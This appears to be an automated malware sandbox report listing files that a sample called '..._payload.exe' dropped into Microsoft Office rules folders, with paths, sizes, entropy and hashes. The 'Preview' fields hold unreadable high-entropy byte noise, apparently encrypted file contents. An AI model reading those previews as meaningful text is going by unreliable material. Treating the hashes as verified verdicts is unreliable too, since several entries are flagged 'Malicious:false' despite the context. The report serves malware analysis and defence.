                                                                                                                          Preview:<?xmlUk..U.N_.......u....n.!BF'N........S<...0...3.. ....]......0.M...B......\L..H5..c .#...&6..q`Pf...U..j..q..;..F.\..S.vxr3..N....l...*...._eE.Q0..Z).^..\\*-.?6l.e...g)......(H...0....t......k.Y?54..h.Q...~.;.........<.y..A80-U~..1.})N..-."..5..h...h........<.e...M/W......Pa9M.y..B..Ry...@1..4...R^j........,.{|.d.x-ht...\...."....1....T......l..Q.5.n[..|..z.._vQ...v.w......uoc...yv...4.+.J..h.....2.....2...;..h....z].OV...#.PcI<.....{..H..;..~...t.q|..\.).....$.$=...|!\..{.RTc.B.[....`....9.Q..f..Ni..E17O|y.v.m.{.&.<x.k.#}.d=...2.>M=.u./{I.....kJ....Gj]=.!H.L..&..P.s.u....1o{s.2..0...T......tF.l...a..:..E..L........-.Y.|.:.4.....n..*..8D0l.BAA..\C.B...Y....A(.P.sq.K...'O.......J.>jQ."I.&>...D..b.th0Q..`.......w+....].....7Xv7.Nl|.....%.b.]....Mz....W.ev..}h...PM.r.....*...U.b.....80|L..@..._.2w.=j.s|..#[,.g....!..6...K...].....4....'.R!....O.=.q......*....S..l4N.@.j.PJ.r..7....l.aia.........mS(v....1q[........W..[.0...-.9.O...h.S<.U......e&.!uA.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule90401v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1583
                                                                                                                          Entropy (8bit):7.860452296788423
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:9yl/cFn+bfniQyJZvXHfcoyNAefM3aimyRBVUOI1eDlNGbD:9yid+zi1zHfc/NZfM3agMSlqD
                                                                                                                          MD5:DEA362F679BFD5068F9D5D97909DEF9D
                                                                                                                          SHA1:F634FC6EADBE4DED98BA6EF69816E4DDE87BEC4E
                                                                                                                          SHA-256:8FEC463765B7AD5B85CDDE95B55B74B826088A9D4D7A17192BFF174575B60468
                                                                                                                          SHA-512:ACA27845EFC4FDBEC14BDC7761C4E43B01280A6728175E6BA9E32079A9CD8D889A265B0AD4DDB9A5CA2F739C33228DE753E212AD67A7D65A1D78E5DAE30BF8C8
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.}.2>.X...-...B@.8rqD3...YmF-.K.jlv.9.(....D?......vy.oa..P.L......e..?\...}Ph .,lG.Rm..L6.".-...f..BC..C...I!v8......r....+...._.o.0L...W..+$..?.0.....4.7.fsv.....F.M.....}..4.H.......s.@......v..~.....!'z......zIO.P..P4Q....N4..T..4.h.N.|....ii..y..d.w.7l8.&.})...COy|FC.....N..........U.:.!..1.7.G.....f...7.a.xB.....u..="...^a.............eu:.o....:...\>.....*T8........]....(g..n.4J_........./.^.....[Gx...=.........L..A..;9NB..rV)>...~..Y.k.+bx.. ..P..8....n.*.aEl.....35......a..$......eO"..k....=Z.....Uvo.!..?.....,..m.....9.Y....Qp.....dPczBy.._.uo}.6e......F.i..^.b...Y....p....+.G..EJ\.:...W..O.......d?c..Y%0p.4W*...6$....Z...~u.y..Y3i..G......3#~W...xG.../.(|.>U.U.X.\.OE.Z_.9.Zg.b........v6..g..O.V~..mq..G..Y..t.|..BM.X...!.....F1.~..f.....g...DY.4.^2&26....j..c..w.t. v._:H..>.5...W=)J!k....^F..G.#......k...."...c#...V]6_.9.+......C..K..a^.N.A.X.IH7..Y.o..4....a..v*.?[gN...V.(.?...f.>|..B.Q.2O..../..b.W-..a.eA.U......!..z..'..x.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):361051
                                                                                                                          Entropy (8bit):6.517334067742088
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:0+GD1qD73lobNLF44h4Gt0PjGcJhY7qd4XizBNmERxhhi1s:d/obdP0P1hY70z3mAks
                                                                                                                          MD5:60A77AA5D94EF9D2B1613BDCD999E168
                                                                                                                          SHA1:001B4034C5B80C0A99DFA6986FA28D5455309EB0
                                                                                                                          SHA-256:C30306E69E1409877D36DE54BFC2A344A5040B840AB4157BCF3A9E893928963C
                                                                                                                          SHA-512:59513C1E8C3A413293A84A0DEB1014037062A3A63E81BDA2DD8C937833C7630560CCBFDCAA385D305182CC17BD3358C7DCB2A3599B562F12A8A692E55B4480FE
                                                                                                                          Malicious:false
                                                                                                                          Preview:<Rule...N.N....0.o,.>.k;...O..[.n6...Pi..........p..\.....3.a.-.0...EHS..j\...W.....DcjN..L. .P.aZ..a.B..j...f.Lm."9..(.jQ<...S}..M...=...$`0.xp#3.5-n.:..b. ....t.koe.B7P.p(.6.B.i.$..!S.`...}^..ebN.G.E]g...f#Z...9..'.>,;...6.R.....Q.....?P.d.3..../N......}A~im..Yx&......%?...e.-.v".x.1?.w.l.[..i=...,....WJ.j.c".].O.l.....HP..a...L....}.........S.......$.v...C_..<'..n...#.~..@..>C..v.`..q....FkD....%..W.Z........J..c.Yh.n..."d..xm.....L.?.(l..<Ga..A5./...}2..^..]....Nk....NwBr.0.{)v.j.+....S.-.W.....r...MI......\S..\.O..~..?@.3eE9.?=R....Q..L..I;.q.pS.}..r....5.....j..mc]s..N.....c.1..f+1..Ci_.4...-c.b....._...ky..9F...>W.;...r.=.0Q.K..;G.TlCzJ..G~..z...k.1+....)KMP..vU..A.*.w...e...L....0}...S!...*.&.H..;..r6...M.).hu.W....T.7&.1#...s.o.H.......rx...B.X..4.T[..0*c..z...4.......ZF. ...W..S....?.~...E9.P..qS.+.W.T..!..A^Gp...1\[Y.....P.Qb.k..2q...+P'..Y.g......V......+..{ .T.............^]..0.9|...<.,[.._J~....e.V.2|.<.....I.)

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule1000v5.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1928
                                                                                                                          Entropy (8bit):7.892262238075963
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:+C0UhJLA1xiiQjXQo3SyyPyNMjWjtziH1TDwtDdn/MhhYD:+l2JnjXQoCymyNWawVTDwhdn/MhhE
                                                                                                                          MD5:9AE8C34E6A846E9FBE9FD89E360B70DC
                                                                                                                          SHA1:F5A93C432F47B10C11D2618C817601B92680EED3
                                                                                                                          SHA-256:96ECB5534B617993A8991878ED630A74D93B19949E8009E4A16D0252A6E67824
                                                                                                                          SHA-512:878EC2588B13B98F6D5B85A2D67A9ABCDAFB0C463FD82AC5A9B9F088306489246F47FD203E34592C3F90BEF4DD55CD5DA36F784A06CACAC50A14CA1B5574094A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml,.......J..6[r0.5...*.f...,.|:..SH.8...Z8{..*g`O.......,a)D.om..'...c........S..B9.5...3C.....m.......o..G.y.{0.S.G.U..T.....3...8...4.vK...I.c6..p..q...O.`_...?1X.6.Q......}...W@...B.......@..V;@b(....b.)$.nf....[........+....sa.]<...$.P.....8............. ......7g....g.!....fP0o. ...%...n..E..2@.*`......3.p\Jc..M_.Y.&.k#.?....).*...Q..4.q..1.2-l.S}...'..p/..0<..u&=..5q..B..M....M...@..=ES.$.x-..R...<....*..*,3....$k.z...#.Q.2..r..:Y...f3.Ar......Ie>K.....7..y>......\...2...6vz*..N.8gi..m..\..i.x.T.Gg.........|_.Ly..]..,-^....S..B.....-..-..E~...N...-5D.~*w...8xajB.#..f.?..z.";.<..U.)...Z..0..bv...........R~1DQ=;...K.....M....O.W.../.....d..o.;.?.@......B|..T.c..~..|......,.y.)8...L.|..C. xN..);d.mg.&....A.7......BP....B.Fz06E....*...2Ix3VzO.......#......:$ma..E.z..F..a.ZQ...7.m..h.........8.o......PV......_...(w.a..;.y.2kC.....i.l.zu.b.....<....w.)..Q.!.=..Rw..u...7....ov.\....95!...g...|..|...$T...@o.......D..W.u.:...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10450v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1387
                                                                                                                          Entropy (8bit):7.853845907545327
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:H0BHHruo08XcHg4IFm++vMJ0DvR0tO6KlYVB2Xm8I0qPu9m1kL1LbD:H0NLuo08sA4IQR78uyVj8I0suGkpvD
                                                                                                                          MD5:EFF21AFD371A046EB483FFB2C6098638
                                                                                                                          SHA1:879FC76C726C3B9236D71C3B09D529636A1DCD06
                                                                                                                          SHA-256:E0A6BF7866EA1DC91088DCC9029EF7E3A07868761FFD199809DE8F48BFF9E351
                                                                                                                          SHA-512:A955EC0BAA4EFB450A104773B06DE0E1CBBFD60B8AAEBF680E5BBDA494B5FF8F87F9910FB671C8AE2951FA88F07F036F09D56C132F9FBB373560132593CBD963
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml1.9.8.@..t....9.c...YZ..>..."z..~h..30..k9~..x.u.r6.... .#.3...y;..../w.......E.......L.^..G.qE.....e......D..A..u..o...>...C)...:......f.l.k..y..d..B=.....<........)....k...tn7=...z....2.X.Jz..7..C...V...v...(Jp.......F...}.."..i.q...b...t.V.".F..B..:.."-.cVmj..%e:*.Ho&F |.A..$.F.$......e.....<..jr...I.........V<..2....r..<..u.>?.b.0..M..7o...o..G.3.C.Q..7.e.}~?...Q...0.O..H....$....qP3J..._.......TX.n....L<.....(.&}..f..~D.......m...,uf.C,....3............$g\.p..L...h..].^.A.HT......L......9k...P:..kU.....~4h..3...-8... atU.J.e'Dj......*6..RhM.i.@w.. .c.v...>............OA..y.]Y.NK+."..Iq.D..v...s..5.....*...>i....."t......)/..P.."z......MZ1..p./...y.kA...S.....h.G.s...y.Sk.M.....?q..W.+......T!8X.p.....xS\.....H.e".+.wZV[...(......^.'..'.s.}..@0.mB.zh.^:.R|.8h..GBE..\...R......*.'...z.!.a.....5.0f/.......V..#.r..].@.4..Ol..sg<....e...Z.....e.e|..e...?..c...N.*..-..2s....L.......z .45:......(r...h....Y...'h:5.`...........H../......O

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10625v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3024
                                                                                                                          Entropy (8bit):7.940950072525019
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:QjclfEZ6Gucy/I5autDsR7F6AOo2Gl1GLSJdvZJdrlOx7CfbVVmDms8I6fwD:XS5swt4FynGlV3dVfbVVmDmNBfs
                                                                                                                          MD5:8CDD0929DF976ECAA20B80E2882FF8E2
                                                                                                                          SHA1:88798770DE598679209E6EBEA5060295E2774AAF
                                                                                                                          SHA-256:7AF6728ADF35B3DB3B5394736EFB66932266F80A396C35E0973F5A2583B45753
                                                                                                                          SHA-512:0E859B701E985BA707225A7D02CCCC5885F987797C6D6063DA539EC15A5BE1EFD4FB90E50510D36F6459B3F2A9FB9B44EE48B268B458859FC0D438323B4B1FA3
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....Eu.x..bZ.V.lb"....>x.:k..N...^...r....H._x\;..^...a...=..n.xS..h...}.....t.+;.E.E..C@.D....1V.D..~..J7.U!..../...xo....^..PLf.{/?.A...CI.u.R@.a=Drk......NP.._<..D{....8C....}.. ?F.j.6.../.....{O.D..=..h....*...@R.2..C..s.?d?..@.O......BT..5i....".....j..Q0$Stc.8F;.4q....I0+M..}.[)X.qp....2..r...7|..........D2..X.S-...o..s..u.ee./I.....Ia.?.J...z...)<..w;.... ,.....<....w-b.Z.......$...'.T$ .....P:hZ..| N.W...j?._/.V.uUE...-HX.....m..L4..tS}P|]l.m.j..+....L.[...N......_{....q.yQ/D.G......=..|2.$.........7...-\.LF....i...W^.&C..e...U}U.......7OS.=.MQ.K.E........QI....s.\i...3.....C=.:......u|i.]G..z..m.7........|S..o.....k.....y..#..@Z..5k..........{Ld..sE.[...$1D.g@.s2..P...t.!..).y.U..Hn....fb........Q|.....k2...".KfG..I(EQ..-v.~u.N.....$.u&#z.ZR.....*....(-.]D._...W..r..x+.....-8..:.U.[.P.2.C..s.tI...6u...P!A.Z...+4;...+.At...5....l..;`..K..bD.}.V../.q.|.D.q..m.D.........$[...*...M.u)-...k..1....r..e..I..w0.....v. ....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702551v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1749
                                                                                                                          Entropy (8bit):7.884767080562472
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:HOencES1JvFRcGSf+PN2Df08qd9OS4bS+Li7KKU/D:HzSkf+PsDfv+9OeKKG
                                                                                                                          MD5:88384522E828428C2372F41BB34EB5F0
                                                                                                                          SHA1:FD5BB21CF6C3A64C12E5D7D404B0D34D39ED4CAA
                                                                                                                          SHA-256:B6E5F6DF5EE224396E4443A1D9ECE8034DE227021F8569DD29BF50EB002EEBD9
                                                                                                                          SHA-512:14016DAA806F31E2C5F11A2F71BEAED2B2F25EB27D1AAA22A59E246E937FF8659A89171423E4FE2A1B208BF19A73C680653B2CE47858DB12CAA007324BD7CB2F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?............?I...l....]F.8,...3r.k..........a......~..A.........&...w..{..b.Y..#.x....Q=.....H..s....y...UX...>.8.P.~...o...4..t.....I.8......'...lE....J.f.C.U...scd.Y9.B..:2..O....D.p.[."M.u.......6C..I.w...."...q...rd.yJ. .I.w.,..j.|w..s.......6.V.."-i*...f{......1..S8.:\.....a.G.z.p.d.t;..Y.....I..|.1..I.=.....?l..%8.Pv.0.b....\..NB.A.Ln...ld..R.N.H..C`..c.(..=...@....>.r?m...6...$vjC,CV...x..2,.V..q......#..e.>...Z.7HQ'p. L."..gNE...Hlb0.+.z(.{].3.|.$.Y..\<3........,.r...I.....]....(7b.p..?....^....CM......h.}@.bI.._.y...."+...p.s.$..Vg....5d8.........4!.@..PZ..U..o.wA............+B.mLo....1m.....].Hv.@z.....[...3F.m...v/..4x....LX@.Dn)5..|....y...Q.j....x...0.../.k=..i..,.>.9..]bf...a..*.za..d...M|.j.p...b..XB'+[..LT.......#rj...'...d.@..G1G..H,..............&L..0h3s....w2....*86/........l{.G.....l-.B.y.~..'}.`q$..R..._<?L..K.E....Z....K.y....f.].!*.*1..`..L.4n...U.]@..,.z....=.Zy7..'(..r..f....R/i.4.W=e......4......Qi..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702600v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1706
                                                                                                                          Entropy (8bit):7.8997537914162175
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:8srl+3mja0e7FwswGUSNryfHFzUrNloO53bPlD:8B3Z0e5wP7lfHFzwToORbPd
                                                                                                                          MD5:4FC7007A6867912B1C0922712EE81694
                                                                                                                          SHA1:96237EFB6F9266555F6706107B28373E689F1932
                                                                                                                          SHA-256:119A9139B3634AE5094AD048B2AD9D15450CABE1E1497F9FF596BD38A9CF52B5
                                                                                                                          SHA-512:DAA4AA7DA7421E7017CB457DCFA4029F1DA3B041CF0CC58330BCBECBA4514212EF7AB54AF67FE16F85AFC1C4D22C75AE5E4712FF29E5B90D71E126D37B98436C
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?%....X...S:H.Q...@.?.H5a...3...0...X.D6.L....2...-.*..o|.Q...l..\ve7O..jnj. l&m....V`8.~...{r/.-.M..r..k.5.......@F.R.e......<..Q...A..?......\..I[..7O..\R.........v...]0.F.....9...]...F.).H[...&#..>Z.W......d....n#;...2.[..&..K.}.g......A.'..b.`..<...bI..I.'........1V....x2t.v|.e....#.P.=..7.H..{...C.z@.6..6.Ez....b[.o@..E..P..d.?..m~}"...6.H"...\..+....y.y..... ...w......mzT.c.1....h.d.......%...s.f.q..:....3..r.@..)...N.zmFe.6.V3.KA.f.b.x...w...}.F..1...J{...3&o..\...G....GN./.3m.p..DO.U.......r...3...U.I+H...W.F..%...]..R...Ow..L..6...q...F.*..q.@SK......'...4E.....3..g............q.XuB..M...tdI:.ik.z.tM)b...l..&."......s.a}...a>.E.Q...wh.....4]......4J...Y8ux...t.,H..[.O....:u.....aY.....Pj.i^!.d..........U..:B.j....]._c....9.:.W.......H]Y.....k..2....V...e.rD|q#.].k..U{P.2..&....W.2.....l..K..^.p.J....`m.X....4..).dL.'..o.&(..1.%.j..S..;.....r`.S.{}.X..aD&..*o.Vz.'*..Z..P,...lhV..<%{.j.\...w...\Z....k.%.f...'....N......b.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702601v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1743
                                                                                                                          Entropy (8bit):7.890711237198783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:QHP6kcu3yGcGoL9oevTbrbz4nmhwMCLCgibY239JD:QvLcu3BKj7s5ni
                                                                                                                          MD5:699B89A8EF020FBB6F7600C44A5EA438
                                                                                                                          SHA1:924C086F55DA53BAF08C05C1027356F298C0DE3B
                                                                                                                          SHA-256:8234412D4D12000A38B357A93C3BFAEF5DAB193A4D542A9C7D8C415AD407650A
                                                                                                                          SHA-512:E064898960A84E440ECC17E9AF94E45EF69B7549CB5D99D8171C330513AC4ACE8A20A2633CB76B1190674CEF28FD6E858007E2FBD71603D938A1ED0EC48F2D40
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.=!1K...>E.N....>h .i.?- t..f.........8..hxVM...0..eN.:U..~..+q.......).....te.......n...L<.R.+#.%..!.F.HdG.g.cauK.....7.1....A_.q!4.,.....3...$.'.#...,.S..~d..s...[..=..Keg....Y....A..RA.F'..Q4"..!]....1..Q9n]..5.*&U+_R.&<..V.yC.......9.&z...]a#.:s.}8....3...p...I.....aT...3.l:uuW*..Q..E.)...O[/MU.j.Y..=...&.1N.....6............d.....eF.....2H.7y.7..i....9o.X...&.p.sAp...3. ."..[..\Ia.,#.I.j.+...Gu...).r...R..R...F.....S...\..{.....Zo+......-.,;6..ekW.......x......g+t......WH.......21.ri.Ti..%..-q.i0...Q.....8.]..6:-B ~....7...a...q.x..>;.J..*.h...%x.0<..0...Z.....).yT0...8...}.d..[...r=[....z...e..I#N3(..W/.;.b..8;....Y.f.f .O....Dc.W.1".{P1.N47.BV..........-....QD..0Kw...N......>.e...qF...[..{WGT............0r...4.#..~..M3^1.E..ffLr.~'.Mb[)Y..|....%..=.{...8.{.[...,H.....%.oq...]P.}@.......;s....../... e{2.<.J.ci.W.....(..r0..g...O.U_...RR$<.].M.0c.6OC=..L*5..+.*.M.......f.Ya3......7.....m90./H...."...w.K..&..a.;5...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702650v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1692
                                                                                                                          Entropy (8bit):7.874989458671971
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:ZwBcUBXFQuDj91F4+zY1uZ1EjeBbteJqlaD:ZN0Vny1C1j0MM
                                                                                                                          MD5:738831F110B56428EC5AD0816980F477
                                                                                                                          SHA1:8B932B0FAC88DF0C0E2AFFB593CC8C70C5AB7E68
                                                                                                                          SHA-256:8DD7389D9B3D2FCD68C4CECA4D60EF4D9C6CE64DF309AD7A8BE99A8FB3E9801F
                                                                                                                          SHA-512:EE5FD7969F37BBDAE0FC4E734E767185070A39FABEFF797325F3D2C5275BE72BB18E09598564E3ECF9BB95299E80462DD2E450AFC6DAAFAD983899C8ECD83BA1
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?..S.SG2|`.#DK..p3CD.T..1.......rB.....zox.....m..+.s.....<cR..>.......&(r>~...a...P....cp.+?O;5re&Y..b..=...>...ri]s..=..u..Q.s..h..!..f.L........%....i.K^m..\..A......3.r.k8w..KF.%.;.D.C_9h....t...l...7q.D.....X{..'...[...........P].<...|...rTNOC.aac..t4......N.~j*R[..e......lh..,..Y.........a.m.(9.....a].....)d0.......k.L..y..&.....O.4(......r.-.MgV..r..A.'.P.+.V.cp[.2.AMnW.7...X.......5..s?........).]T..y.X.B.`|..c+.&..e8...v.D>...B.?.bd.L..+.O.f.K.U..A....K|y~.y..a..X.%H.PHV...../.....O.I..."@k.l..?&.C.L]K.4.e.......... I........)....\y...Z.:.....Q..[,6..[j...o..m...M.x+0^...2....P.z.E..d.R...v.5.y.Ih..Ka*...kl..h........-.2...U~.Y...~p....6..N0%.6j..[...I.iN...'....}.../BIg. ..Zx.....>>(.n....9.&..Ez_M..uj.tE.[%]l..k...../.t..A>5..\..[a..A..4E.0eMqdF.5Oqv.~.};J.:..GP..Sd6m......".,[?*.X.KaQ.V..`\}..v.bu...*..$.$.vsa[.l.V.Weu^.$.7@.....I.UD..!.P...H.T..).$&H....VE...a.aE.qGa..=9C.C..:...p.F*.1..5...&...8..[Q......D.Z..&.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702651v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1729
                                                                                                                          Entropy (8bit):7.88249631839579
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:FuLv/4RpaA5sGLM4BOQ/kechlolILESWwrwD:Fuj/4sgM4jzIASe
                                                                                                                          MD5:6F9AC82516A7BD5533BEA7FFDB387072
                                                                                                                          SHA1:318B7ED9F790727444B5DADAA9774BBA9F7BC5B4
                                                                                                                          SHA-256:49D3BEA244D9C94FDF872ADD56FBA1A08014343440F580F744F8A01E34078740
                                                                                                                          SHA-512:F46FBB90D28C28BEC509FD69CFF8E3E8C0E2113C2AC7F05A550C0A074B468D556A816A93FC3C3C5493607F9100F34E3B275751A531CC097CDA87EF6376765FB3
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?..HH..b.mU.Wp.D..@..F........G.F....E=1.X..L..g..H....Wo3.z.....Y...[A..Z.a.)...#..-..G?"*../...Vi&...>...3=.fs.WO....hm..F.!..D..W..8.Y....!F......Z..>..\.U....-..U...#.i..0...M..C......N.Q..,...`].........&R.."...)..... Wrb...9...D/....@....|.eC..3....d......i.....[ED. .N.<..iv..........?.d............Zu~...:.|0_b..*zX.....oQ....\.....3...y..y....&..9z.x..R.m.............4B.N>..6...B.y.^."?......e`<.....@......U=@J.d.b.QK.S.-.....UP.._'.G.`............o..a......'e+.j.3.....am.}T$...G,}.)....(.t......N....'.....P...a.s}.dU<>B.1..Z....Q..`s.......'.P..7.s.(H.n.N~.......L...q.(.Zq....K......?(.aY...8v......[....j...7.<..Q'....!..^.;..'(...*....s.P..TE.kL..H..7o..|.\.N..gCO...5..)....?...~..i.....2|...Wj..x...tj ...;,.%yK.......D..F..o..&K...)......le+...j>......[.{IuI.$..2....+.1D..V.u...aGl"0.......E...gR.@2F^.......r..1..)...V.77....;.A..u......%.....-.N.8...)3..#1c...z.!.... ....|.....L5.....;.x.......M....'...nI.x..Q.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702700v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1701
                                                                                                                          Entropy (8bit):7.882823690943303
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:cQdkt8uBkZwu4b31Zb4d/2/EdFjxRLugE6OYD:St8v2znbcO/EXRLuM
                                                                                                                          MD5:AB1BB4A4F27181ED2CDC41B162C9A4C9
                                                                                                                          SHA1:972FBD05D4A691D8654C4BF3F0ECF53D86DADE07
                                                                                                                          SHA-256:BF2AB8A7AE917F80597DC01C8E4620749AD5BACB81CE7DD5911144359DE047B4
                                                                                                                          SHA-512:32CBBEDA8054C210A1D8CCE91AF6BD683614854E991DD2C5EA7FF2FEF5FE13F2510DF26AC24CFB400DB9BC85B867CF5A26FA7E664732AEC3BEFED4F735CAE98B
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?Y.#%..*....I.Q..v.;.W.j.....l.4..t0....w...b.f7...x_.lV"h.`F.<S.B\C.v?..i<.>EL.D....e..Ba.../e....'1...VS>s.]o-{./n.D..&....4.L....W........L.Z&8..`.....hh.&..m.LJ.....-.m.j..&E...K..V..U<D....M.Q...1Gox.5..F..^...C..]Z.....W.y..|SG.Nq..t..V.$N.1Ex.. Y(.]<.FW.n1Kb/.|.t>..GJ.p...........3<o..B....)......Z~-.(..,...80..........i.....x..s.E..5.Mi....F..d........nOj....\.2.Y........-...#...g'..+.../m...Y...}.M....n.........wO..:....S.7.DL.!W.M.D..OW....h9..f%....t/..e....~.G<...3%t-2.....xq.w._..]LR.#..L..a..a...bb......02B.\..............fN;..e...].!.k.....Hc.@8..O.b.am..8.....b.u_..mj..5.;.`.A.......f.z....W~so...'4........d..7.p.&+%>..2.BI.'Q..).A{E......u.~...%....N...y....pVG...>.\...M...#.hu..WMy..7.oT.=C.2f....[.%6.B.)....\..+.......(....)jys... .1...|....V....|^8Z.&.....xs.Qs.F.a1.h*Ln_?.:..H.G4E.,...D.!.........$......='s.3I..Y..._......I...t .H.E.v,....).]..Z.Qe.(>...\......._C[...z<7j...c.....KW...Zg.."...I...aYG0...H,...1N&

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702701v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1738
                                                                                                                          Entropy (8bit):7.888175571949941
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:O5oTuj8hK4AoRVao8XOS/Db+86SfbGwK58D:aoiqKR0AH/Db+fKk4
                                                                                                                          MD5:E3FCF4964AEE3000AB829FC81EF1B074
                                                                                                                          SHA1:2AB6A78919B1AC04981508566C10A8DEA3A06EB3
                                                                                                                          SHA-256:D941C8E74B49BB0A55D1DFBE15DC204E991142B84C78CEDE647BDB4DC4C32E6C
                                                                                                                          SHA-512:704BDDA24453830E6DA69A23C14EE7DFB9AAB748683A0663ACA12DCF97284A26447CE4FE609946D4C5A0B63DECCCE0DD04B671C1128E3C9F0710D441C0DC8041
                                                                                                                          Malicious:false
